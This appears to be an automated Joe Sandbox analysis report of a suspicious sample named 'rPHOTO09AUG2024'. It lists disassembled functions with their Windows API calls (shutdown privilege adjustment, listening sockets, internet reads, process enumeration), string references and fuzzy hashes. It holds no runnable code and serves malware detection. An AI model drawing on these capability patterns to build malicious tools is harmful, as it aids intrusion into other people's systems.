Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: ae006233734567d82e51569f258cbe0cf96f5cc4dcd04a7fad159bd4331bee7c
Instruction ID: cef16eb1f329ac861f7c97e444e8bc4b1f7501aa5763e5fd6bfe8f7dbcb98eeb
Opcode Fuzzy Hash: ae006233734567d82e51569f258cbe0cf96f5cc4dcd04a7fad159bd4331bee7c
Instruction Fuzzy Hash: 3741607190021A9FCF51DFA4CC85AEEBBB5FF06310F1845A6E815A7291DB309E44CBB0

Function 00D54140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00D544DB
VUUU, xrefs: 00D54520
ERCP, xrefs: 00D5421F
VUUU, xrefs: 00D544ED
VUUU, xrefs: 00D87B0C

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 71bf08648db6597f946a072e90373f59d0da2fb31927f6533c758ebf871b88e6
Instruction ID: 4c19755ba5f89edba4d3dd515c44fea6fd30d6284644220db749e7dd38e8f0a7
Opcode Fuzzy Hash: 71bf08648db6597f946a072e90373f59d0da2fb31927f6533c758ebf871b88e6
Instruction Fuzzy Hash: 27A26D70E0421A8BDF24DF58C9807ADB7B1AB55319F2881A9DC59A7280E730DEC9DF61

Function 00D558C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D55A05
_memmove.LIBCMT ref: 00D55A55
_memmove.LIBCMT ref: 00D55ABB

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d489c77d91be30a9874aebd09f0f8b9ae85657badb333c1a5be20d76562689d3
Instruction ID: 98f6668473300feb92790f4ab745b3630e240544f9774c8980efa36d2ae03481
Opcode Fuzzy Hash: d489c77d91be30a9874aebd09f0f8b9ae85657badb333c1a5be20d76562689d3
Instruction Fuzzy Hash: 8E129870A00609EFDF04DFA4E991AAEB7F5FF48300F148269E846E7255EB35A915CB70

Function 00DA545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00D98CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D98D0D
Part of subcall function 00D98CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D98D3A
Part of subcall function 00D98CC3: GetLastError.KERNEL32 ref: 00D98D47

ExitWindowsEx.USER32(?,00000000), ref: 00DA549B

Strings

SeShutdownPrivilege, xrefs: 00DA546B
@, xrefs: 00DA548E
, xrefs: 00DA5489

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 5d9b5a856df83676ec5745a11bb9d7daea17f47658488076aa39b4daf25d6cb8
Instruction ID: 4776b73afdef4a9b998535055f4289a2555fd0eac4226933c4662e76411f296b
Opcode Fuzzy Hash: 5d9b5a856df83676ec5745a11bb9d7daea17f47658488076aa39b4daf25d6cb8
Instruction Fuzzy Hash: 27014232654B026AEB286378FC4AFBA7258EB0B753F280524FD46D20C6DAD04C8082B0

Function 00DB6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00DB65EF
WSAGetLastError.WSOCK32(00000000), ref: 00DB65FE
bind.WSOCK32(00000000,?,00000010), ref: 00DB661A
listen.WSOCK32(00000000,00000005), ref: 00DB6629
WSAGetLastError.WSOCK32(00000000), ref: 00DB6643
closesocket.WSOCK32(00000000,00000000), ref: 00DB6657

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 5f2748eb0ab532da91ab9842b8655fb014a7a392ebfbb2a1ae2226dffe1d6b0f
Instruction ID: 7ebdbbb1aa40d8f0563565a04363d544652a9a7d243f206d8ef4790788c8a1cf
Opcode Fuzzy Hash: 5f2748eb0ab532da91ab9842b8655fb014a7a392ebfbb2a1ae2226dffe1d6b0f
Instruction Fuzzy Hash: 11216D716002059FCB10AF64C896FAEB7AAEF44720F148199F956E73D1CB74ED018B71

Function 00D55680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00D60FF6: std::exception::exception.LIBCMT ref: 00D6102C
Part of subcall function 00D60FF6: __CxxThrowException@8.LIBCMT ref: 00D61041

_memmove.LIBCMT ref: 00D9062F
_memmove.LIBCMT ref: 00D90744
_memmove.LIBCMT ref: 00D907EB

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 80c6a3a59537d6d5452874649de891342ec7515ba24d9a472705845c26574107
Instruction ID: ea0716b6f702a0c79dfdc60ab318ad1442575ba8e7a56ffbff112f5b114eb5e2
Opcode Fuzzy Hash: 80c6a3a59537d6d5452874649de891342ec7515ba24d9a472705845c26574107
Instruction Fuzzy Hash: ED0290B0A00205EFCF05DF64E991AAEBBB5EF44310F188069E846DB355EB31DA55CBB1

Function 00D41287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00D419FA
GetSysColor.USER32(0000000F), ref: 00D41A4E
SetBkColor.GDI32(?,00000000), ref: 00D41A61

Part of subcall function 00D41290: DefDlgProcW.USER32(?,00000020,?), ref: 00D412D8

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 7615343ce613dc8acd0c6b79c80dc85d245078acccb5567eb4ab632ec6d88360
Instruction ID: 082e75f507ac08e525078050b1fb8a53116dd50dfd0cf8fc2033878cdedc662e
Opcode Fuzzy Hash: 7615343ce613dc8acd0c6b79c80dc85d245078acccb5567eb4ab632ec6d88360
Instruction Fuzzy Hash: 1CA18978111546BFEB28AF298C4AFBF399DDB42355B1C811BF546D6192DE20CCC282B2

Function 00DB6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00DB80CB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00DB6AB1
WSAGetLastError.WSOCK32(00000000), ref: 00DB6ADA
bind.WSOCK32(00000000,?,00000010), ref: 00DB6B13
WSAGetLastError.WSOCK32(00000000), ref: 00DB6B20
closesocket.WSOCK32(00000000,00000000), ref: 00DB6B34

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 2bb5ae85eb029a32a712d5337dbc677689539217b5227a389462630796aca2d6
Instruction ID: a9f30723702a761dfeb3976512b83f6cfe406eb60a05af57bf498903b53af437
Opcode Fuzzy Hash: 2bb5ae85eb029a32a712d5337dbc677689539217b5227a389462630796aca2d6
Instruction Fuzzy Hash: B9419275740210AFEB10BF64DC96F6EB7A9DF44710F448058F95AAB3D2DA749D008BB1

Function 00DC55FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00DC564C
IsWindowEnabled.USER32 ref: 00DC565A
GetForegroundWindow.USER32(?,?,00000001), ref: 00DC5667
IsIconic.USER32 ref: 00DC5675
IsZoomed.USER32 ref: 00DC5683

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 3dba543c05d7ee16f677dc4a3d3b0f6b6899c3f9634980cae9e8096d99edf326
Instruction ID: 53dc25d86b5648b3bf0bff85c5716215a544638cd190873ba48addcf86bba4cd
Opcode Fuzzy Hash: 3dba543c05d7ee16f677dc4a3d3b0f6b6899c3f9634980cae9e8096d99edf326
Instruction Fuzzy Hash: FD11BF32380A136FE7215F26EC44F6BBB99EF54721B88442DF846D7241CB70E9428AB4

Function 00DBC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00D81D88,?), ref: 00DBC312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00DBC324

Strings

GetSystemWow64DirectoryW, xrefs: 00DBC31E
kernel32.dll, xrefs: 00DBC30D

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: d3e836f417468bea4fd6fe43c9ee703a61ff977378c3941b8fd8107fafbeac63
Instruction ID: 5053d412f6e76f5b14c9fd63edfc89ee58a49ad847cc826fad989229b4122c43
Opcode Fuzzy Hash: d3e836f417468bea4fd6fe43c9ee703a61ff977378c3941b8fd8107fafbeac63
Instruction Fuzzy Hash: 74E08C70210303CFCB204F25C804FC676D4FB08314B88D43AE886C6320E770D844CA70

Function 00D53190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 74a260d73041d1c5a031a41f99419193761c6bd2e2bcbf1f691168155cba5f40
Instruction ID: 46098ed5c14dd580483aec28db2d6f8be5106b81ec283a1bea8d35a1f9c00637
Opcode Fuzzy Hash: 74a260d73041d1c5a031a41f99419193761c6bd2e2bcbf1f691168155cba5f40
Instruction Fuzzy Hash: C3226A715083019FDB24EF24C891B6BB7E5EF84744F14491DF89A97291EB71EA08CBB2

Function 00DBF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00DBF151
Process32FirstW.KERNEL32(00000000,?), ref: 00DBF15F

Part of subcall function 00D47F41: _memmove.LIBCMT ref: 00D47F82

Process32NextW.KERNEL32(00000000,?), ref: 00DBF21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00DBF22E

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 6f525e86d795fd7c30f5cad01b6f98fc2b4a034948720d89b75bff26f12c8864
Instruction ID: dac350937a14037789dee823aecc9e583ddd2a788f803efb74164430a7c8a4fb
Opcode Fuzzy Hash: 6f525e86d795fd7c30f5cad01b6f98fc2b4a034948720d89b75bff26f12c8864
Instruction Fuzzy Hash: B0514B71504311AFD310EF24DC86EABB7E8EF98750F54482DF59697291EB70A908CBB2

Function 00DA40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00DA40D1
_memset.LIBCMT ref: 00DA40F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00DA4144
CloseHandle.KERNEL32(00000000), ref: 00DA414D

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: db06c0ad8665261941d7ae2ee5c64c6ff939b4f7d373365fca7ff343637837c7
Instruction ID: 7c7e31a8e2c0459f3a65f389a959f8cc98208bc3c24e2268379ad92765ae11f1
Opcode Fuzzy Hash: db06c0ad8665261941d7ae2ee5c64c6ff939b4f7d373365fca7ff343637837c7
Instruction Fuzzy Hash: DD11A7759013287AD7309BA5AC4DFEBBB7CEF85760F1041AAF908D7280D6744E848BB4

Function 00D9EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00D9EB19

Strings

(, xrefs: 00D9EB5F
|, xrefs: 00D9EB49

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: c2732d0ff44778bf2eaffdfc610473574648052494aea7d90b29160e50218236
Instruction ID: 2b26e99d1e1f79686e903194c1af290ca1bcd4de1f2f22899bb324484e05adbb
Opcode Fuzzy Hash: c2732d0ff44778bf2eaffdfc610473574648052494aea7d90b29160e50218236
Instruction Fuzzy Hash: 14323675A007059FDB28DF19C481A6AB7F1FF48320B15C56EE89ADB3A1EB70E941CB50

Function 00DB25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00DB26D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00DB270C

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 83e89c43cfda8f4e70d82481b1c23b74c144ffd4339fb2edf29c712203702086
Instruction ID: de362aeb0267d49a09bb4466c48706849969c961877b4c2821171e4061d3dc9d
Opcode Fuzzy Hash: 83e89c43cfda8f4e70d82481b1c23b74c144ffd4339fb2edf29c712203702086
Instruction Fuzzy Hash: 7C41A076900209FFEB219B94DC85EFBB7BCEB40724F14406AF646A6140EA71EE419674

Function 00DAB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00DAB5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00DAB608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00DAB655

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: d96bda043f65d417f9a86718a534ce2abbdb009f6fbf8c7910d8bbe46668ca28
Instruction ID: fedf71792c159b88b144864e0937ace735beb0bef839ed08187fedce402dffdd
Opcode Fuzzy Hash: d96bda043f65d417f9a86718a534ce2abbdb009f6fbf8c7910d8bbe46668ca28
Instruction Fuzzy Hash: D4214F35A00218EFCB00DF65D881EAEFBB8FF49310F1480A9E845EB351DB319915CB61

Function 00D98CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00D60FF6: std::exception::exception.LIBCMT ref: 00D6102C
Part of subcall function 00D60FF6: __CxxThrowException@8.LIBCMT ref: 00D61041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D98D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D98D3A
GetLastError.KERNEL32 ref: 00D98D47

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: b69dd6e98186d4444a014cb3830c000aa6f98be69a710ccd073c7cab146c0462
Instruction ID: 62fa055df39fc675d13ff89a5c3eccc5c7eb879f22c330a1145e0f52c7272180
Opcode Fuzzy Hash: b69dd6e98186d4444a014cb3830c000aa6f98be69a710ccd073c7cab146c0462
Instruction Fuzzy Hash: 79118FB2514309AFDB289F54DC85D6BBBB9EB44B10B24852EF45693241EB30AC409A70

Function 00DA4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00DA4C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00DA4C43
FreeSid.ADVAPI32(?), ref: 00DA4C53

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 8178b7f5ace054156bbfa0e2dabdaa7c4b45e1859c765b93aaa0c8b684542856
Instruction ID: 705dd6e225c0a99299a12e90dad141c87a359f0ea5496d3868c552b2515280d6
Opcode Fuzzy Hash: 8178b7f5ace054156bbfa0e2dabdaa7c4b45e1859c765b93aaa0c8b684542856
Instruction Fuzzy Hash: 70F04F7595130EBFDF04DFF0DC89EEDB7BDEF08611F004469A901E2281D6705A049B60

Function 00DA8B13 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00DA8B25

Part of subcall function 00D6543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00DA91F8,00000000,?,?,?,?,00DA93A9,00000000,?), ref: 00D65443
Part of subcall function 00D6543A: __aulldiv.LIBCMT ref: 00D65463

Strings

0u, xrefs: 00DA8B1C

Memory Dump Source

